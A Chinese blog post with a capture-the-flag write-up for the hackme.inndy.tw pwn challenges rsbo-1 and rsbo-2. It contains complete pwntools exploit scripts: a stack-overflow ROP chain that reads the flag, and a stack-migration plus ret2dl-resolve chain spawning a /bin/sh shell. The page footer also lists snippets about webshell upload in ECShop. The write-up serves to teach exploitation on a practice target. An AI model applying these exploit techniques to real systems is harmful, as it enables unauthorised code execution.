rsbo-1和rsbo-2的writeup

最新推荐文章于 2019-08-07 17:44:50 发布
最新推荐文章于 2019-08-07 17:44:50 发布
阅读量501 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zszcr/article/details/80044074
版权

rsdo和rsdo-2writeup

这两道题的文件是一样的,不过一个没要求getshell,一个要求getshll

先说rsdo
防护机制
这里写图片描述
只开启了堆栈不可执行
题目hint: ROP, open, read
很明显要要用ROP调用执行open()函数打开flag文件 然后用read()函数读取文件
ida反编译代码
这里写图片描述
**这里写图片描述

它先执行init函数 ,打开“/home/ctf/flag”文件,然后读到buf上,再用随机数将buf的内容破坏,最后用memset将buf的内容清零。然后执行read_80_bytes()函数,这里存在溢出点,具体需要填充的字节为108,这个函数读取0x80个字节的内容到v5上,然后将返回值赋给v8,接下来的一个for循环会将会随机破坏内存中的数据,最后调用write()函数输出v5的内容

解题思路:

  1. 利用open()函数打开flag文件
  2. 利用read()函数将flag读到bss段
  3. 利用write()函数将flag打印出来

payload的构造填充的字符要用”\x00”,我看大佬的博客说好像是为了使v8的值为0,绕过循环

exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level="debug"
p = process('./rsbo-1')
#p = remote('hackme.inndy.tw', 7706)
elf = ELF('./rsbo-1')

start = 0x08048490
open_plt = elf.symbols['open']
read_plt = elf.symbols['read']
write_plt = elf.symbols['write']
log.info("open_plt -->[%s]"%hex(open_plt))
log.info("read_plt -->[%s]"%hex(read_plt))
log.info("read_plt -->[%s]"%hex(write_plt))
bss = elf.bss()
offset = 108
flag_add = 0x80487d0

payload = '\x00'*offset + p32(open_plt) + p32(start) + p32(flag_add)  + p32(0) 
p.send(payload)


payload1 = '\x00'*offset + p32(read_plt) + p32(start) + p32(0x3) + p32(bss) + p32(0x60)
p.send(payload1)

payload2 = '\x00'*offset + p32(write_plt) +p32(0xdeadbeef) + p32(1) + p32(bss) + p32(0x60)
p.send(payload2)


p.interactive()

运行结果

这里写图片描述

接下来说下rsbo-2
**hint:**Get shell please. Tips: stack migration

它要求我们获取目标主机的shell,同时还给了 migration的提示
因为可供我们控制的溢出字节为20 不足以构造出我们getshell的rop链
所以要将stack迁移到我们能控制的地方去

这题可以用泄露libc内存的做法来做也可以用_dl_runtime_resolve的做法
我选的是_dl_runtime_resolve的做法,因为最近才学会,多用下练手

栈迁移用到的gadget是 pop_ebp 和 leave_ret
这里栈迁移的地址不能是bss段的开头 很神奇,我也不知道为什么会这样
我选的地址是bss+0x400

解题思路:
1. migrate stack to bss + 0x400
2. 构造调用read函数和_dl_runtime_resolve函数的rop链
3. 在内存中写入_dl_runtime_resolve函数需要用到的参数

  1. migrate stack
payload = '\x00'*108 + p32(read_80_byte) + p32(pop_ebp) + p32(bss + 0x400) + p32(leave_ret)
  1. built rop chain
payload = 'a'*4 + p32(read_plt) + p32(ppp_ret) + p32(0) + p32(base_stage) + p32(100)
payload += rop.dl_resolve_call(base_stage+20,base_stage)
payload += rop.fill(0x80,payload)
  1. write argument in base_stage
payload = rop.string('/bin/sh\x00')
payload += rop.fill(20,payload)
payload += rop.dl_resolve_data(base_stage + 20,'system')
payload += rop.fill(100,payload)

exp:

from pwn import*
import pwnlib
import roputils
context.log_level = "debug"
p = remote('hackme.inndy.tw', 7706)
#p = process('./rsbo-1')
elf = ELF('./rsbo-1')

rop = roputils.ROP('./rsbo-1')
offset = 108
bss = elf.bss()
base_stage = bss + 0x800
print hex(base_stage)
pop_ebp = 0x0804879f
leave_ret = 0x080484f8
pop3_ret = 0x0804879d
start = 0x0804867F
read_plt = elf.symbols['read']
log.info("*********migrate stack***********")
payload = '\x00'*offset  + p32(0x804865C) + p32(pop_ebp) + p32(bss+0x400) + p32(leave_ret)
p.send(payload)

payload1 = 'a'*4 +p32(read_plt) + p32(pop3_ret) + p32(0) + p32(base_stage) + p32(100) 
payload1 += rop.dl_resolve_call(base_stage+20,base_stage)
payload1 += rop.fill(0x7f,payload1) 
p.sendline(payload1)

buf = '/bin/sh\x00'
buf += rop.fill(20,buf)
buf += rop.dl_resolve_data(base_stage + 20,'system')
buf += rop.fill(100,buf)
p.send(buf)

p.interactive()

这里写图片描述

zs0zrc
关注
专栏目录
SAP 生产订单修改记录查询
我小时候很黑的博客
04-27 5005
无论在项目实施过程中还是在运维的项目中,经常会遇到生产订单被修改,导致需求发生变更,这个时候用户经常就会需要要求查询生产订单的修改记录
rsborsbo2的wp
一个码农的笔记
11-24 1659
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rsborsbo2这两个题目感觉还不错,我把wp分享出来,方便大家学习 rsbo的题目要求是: nc hackme.inndy.tw 7706 Tips: ROP, open, read把rsbo直接拖入ida中 main函数: init函数: 这个程序首先在init函数中读取了flag文件
SploitFun Linux x86 Exploit 开发系列教程
05-01
SploitFun Linux x86 Exploit 开发系列教程。看完之后感觉多少还是有点收获的,简单看一遍不管用,需要发散思考一下。挺有参考价值的
Exploit扫描工具
08-30
这个是Exploit扫描工具,集成了最新的Exploit,扫描到后,你们懂的
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 644
因为rsborsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 515
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
基于OAuth2.O的资源共享机制RSBO (2012年)
05-07
本文针这些问题,提出了一种基于OAuth2.0协议的资源共享机制RSBO(Resource Sharing based OAuth2.0)并对其进行阐述,RSBO利用OAuth2.0协议认证授权的访问令牌原理,为共享资源创建资源令牌,该机制解决了用户信息泄露及...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
SAP BW学习资料
09-03
2. BWCCMS:SAP BI监视器,提供对SAP BW系统性能和健康状况的监控。 3. CHANGERUNMONI:变更运行监控器,用于跟踪和管理SAP BW中的数据加载和处理步骤。 4. DB02:表和索引监视器,用于检查数据库的健康状态,包括...
ECSHOP后台getshell漏洞
11-25 5817
ECSHOP后台getshell漏洞 2014年03月20日00:55 阅读: 1733 次 标签: ECSHOP后台getshell漏洞 简要描述: ECSHOP 后台getshell 详细说明: admin/edit_languages.php elseif ($_REQUEST['act'] == 'edit') { /* 语言项的路径 */
WebLogic RMI 编程(四)
09-25 1111
使用 IIOP 上的 RMI 以下部分提供 IIOP 上的 RMI 的高级视图: 什么是 IIOP 上的 RMI? WebLogic RMI-IIOP 概述 协议兼容性  什么是 IIOP 上的RMI? IIOP 上的 RMI 将 RMI 扩展为可在 IIOP 协议中工作。这样带来了两个可以利用的好处。在 Java 到 Jav
WebLogic RMI 编程(五)
09-25 2173
为 RMI-IIOP 配置 WebLogic Server 以下部分描述与 为 RMI-IIOP 配置 WebLogic Server 相关的概念和过程: 设置监听地址 设置网络通道地址 使用 IIOPS 瘦客户端代理 在 SSL 和 Java 客户端中使用 RMI-IIOP 通过委托从 CORBA 客户端访问 WebLogi
Ecshop后台拿shell方法总结
11-25 6725
方法一:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/M
hackme.inndy rsbo2 经验总结
qq_43189757的博客
08-07 300
这题想用retdl-resolve 来解题,可是自己手写的脚本过不了,搜过其他的wp,发现有很多种解法,利用DynELF泄露libc地址, 或利用write直接泄露libc地址(题目给了libc),但是我就是想用栈迁移和retdl-resolve解题,但是搜到的wp几乎都用了roputils工具,这工具我不会用也没搜到什么教程,然后经过一段时间的无能狂怒之后最后决定求人不如求己,自己去看roput...
Linux(x86) Exploit 系列
五月杂货铺
03-21 1073
最近发现了一个不错的外国博客,准备将博客中Linux (x86) Exploit Development Series这个系列搬运过来。
ecshop后台0day漏洞原理+利用方法 XSS+Getshll
weixin_30469895的博客
11-20 5396
发布日期:2012-10.25 发布作者:dis9@ztz 漏洞类型:跨站攻击 代码执行 0x0 后台getshell 在 includes/cls_template.php fetch函数 /** * 处理模板文件 * * @access public * @param string $filename * @param sting $cache_id *...
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 486
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
漏洞信息获取
xiaoi123的博客
12-07 1486
最近斗哥在逛某论坛的时候,看到有人提出一个问题:“如何快速获取第一手漏洞信息,可否介绍一些第一手漏洞信息的获取渠道?”so...雷厉风行的斗哥这就为大家带来了介绍。漏洞信息的获取渠道1.网站 https://seclists.org/fulldisclosure/ 任何黑客都会告诉你,在任何网站上都找不到最新的新闻和漏洞,甚至没有。而在这里,一个公共的,与供应商无关的论坛,最新的漏洞有时会在Bug...
pwn --栈迁移
zszcr的博客
04-07 7036
栈迁移主要是为了解决栈溢出可以溢出空间大小不足的问题栈迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值